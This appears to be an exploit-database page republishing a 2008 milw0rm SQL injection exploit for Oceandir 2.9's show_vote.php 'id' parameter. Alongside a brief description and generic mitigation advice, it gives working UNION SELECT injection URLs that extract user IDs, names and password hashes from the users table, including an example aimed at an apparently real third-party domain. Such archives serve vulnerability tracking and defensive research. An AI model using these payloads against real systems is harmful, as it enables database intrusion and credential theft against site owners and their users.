Oceandir - exploit.company

vendor:

Oceandir

by:

JEEN HACKER TEAM [ Jeen + Secertry ]

CVSS

HIGH

SQL Injection

CWE

Product Name: Oceandir

Affected Version From: 2.9

Affected Version To: 2.9

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

Oceandir <= 2.9 (show_vote.php id) Remote SQL injection

The vulnerability exists due to insufficient sanitization of user-supplied input passed via the 'id' parameter to '/show_vote.php' script. A remote attacker can execute arbitrary SQL commands in application's database and gain access to sensitive information.

Mitigation:

Input validation should be used to prevent SQL injection attacks. The application should sanitize all user-supplied input to prevent SQL injection attacks.

Source

Exploit-DB raw data:

/**
 * @title Oceandir <= 2.9 (show_vote.php id) Remote SQL injection
 * @author JEEN HACKER TEAM [ Jeen + Secertry ]
 * @cost 250$ 
 * @script http://www.oceandir.com
 * @copyright 2008
 * @homepage http://www.hackteach.org/cc/teach.php
 * @email SVN@HOTMAIL.COM , CPY@HOTMAIL.COM
 */

Exploit :
~user
http://www.site.com/dir/show_vote.php?id=-1+union+select+user_id,fname,3,4+from+users
~passwd
http://www.site.com/dir/show_vote.php?id=-1+union+select+1,hashed_pw,3,4+from+users

Example :
####
http://www.dir.qatarw.com/show_vote.php?id=-1+union+select+user_id,fname,3,4+from+users
http://www.dir.qatarw.com/show_vote.php?id=-1+union+select+1,hashed_pw,3,4+from+users
####

Greetz : www.hackteach.org user's

# milw0rm.com [2008-09-20]